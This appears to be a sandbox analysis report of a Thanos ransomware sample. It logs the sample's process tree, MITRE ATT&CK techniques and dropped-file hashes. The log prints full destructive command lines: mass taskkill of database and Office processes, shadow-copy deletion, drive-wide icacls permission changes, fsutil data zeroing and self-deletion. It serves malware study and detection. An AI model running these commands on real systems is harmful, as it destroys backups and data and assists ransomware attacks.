C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Thanos_23_03_2021_91KB.exe2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
504B
MD53f13c80e02a89513ec0dce068c0d4036
SHA1d5136c73158cbf1ae21a2a0fe80ff99561d6e161
SHA256df5e0e9e32581eb04d7d681eb7a72fc1317311d5ee31e57b203ce1ffeebf437a
SHA512a47f0de45bcf45741ec99a4610cc72d7da5e7e2186d345ff666f5db6df9686bbd7f9bfea8099eecd4e81a8538d8ee1b631cf1462266119702c02cee76e9198e2
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
216KB